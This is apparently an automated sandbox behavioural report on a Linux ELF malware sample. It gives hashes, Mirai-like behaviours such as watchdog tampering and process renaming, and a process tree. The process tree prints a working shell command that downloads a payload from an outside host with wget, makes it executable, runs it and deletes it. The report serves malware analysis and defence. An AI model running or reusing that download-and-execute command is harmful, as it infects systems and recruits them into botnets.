Analysis
-
max time kernel
146s -
max time network
140s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
02/04/2024, 01:17
Behavioral task
behavioral1
Sample
a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
-
Size
114KB
-
MD5
535e42bda70b4c58e32e5f244ee715f1
-
SHA1
70150ad2d0028bf5fbac7781aa18665102b6070e
-
SHA256
a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf
-
SHA512
1d907628b4333ca1e653fc7e73e6ecbb5cb2307bb060169b4fcee62e9e6d5c171101e93d3afeea9deafd3bea1820c3b3d1c78317d7e0acb49b415c4a5b2e62cf
-
SSDEEP
3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJioud2yd1m7FnVqfJXoebNb:SKo/O8qtUbKXbm7FnVqfJXoebNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 1458 a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 1482 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:1458 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:1459
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:1466
-
-
/usr/bin/chmodchmod 777 .....3⤵PID:1481
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:1482
-
-
/bin/sh/bin/sh ./.....3⤵PID:1482
-
-
/usr/bin/rmrm -rf .....3⤵PID:1485
-
-